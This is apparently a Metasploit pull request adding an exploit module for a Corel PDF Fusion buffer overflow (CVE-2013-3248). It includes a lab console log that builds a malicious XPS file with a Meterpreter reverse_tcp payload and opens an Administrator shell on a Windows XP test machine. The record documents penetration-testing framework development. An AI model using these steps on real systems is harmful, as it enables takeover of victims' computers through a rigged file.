Add module for CVE-2013-3248

[jvazquez-r7]

Tested successfully with Corel PDF Fusion 1.11 / Windows XP SP3.

Tested with the trial downloaded from: http://www.corel.com/corel/product/index.jsp?pid=prod4100140&cid=catalog20038&segid=1105&storeKey=us&languageCode=en

At the time of writing the available trial is the vulnerable version still. If something changes don't hesitate to ask me for a vulnerable version installer.

Test results:

msf > use exploit/windows/fileformat/corelpdf_fusion_bof 
msf exploit(corelpdf_fusion_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(corelpdf_fusion_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(corelpdf_fusion_bof) > exploit

[*] Creating 'msf.xps' file...
[+] msf.xps stored at /Users/juan/.msf4/local/msf.xps
msf exploit(corelpdf_fusion_bof) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1511) at 2013-07-11 12:29:08 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit

[wchen-r7]

Works for me, merging.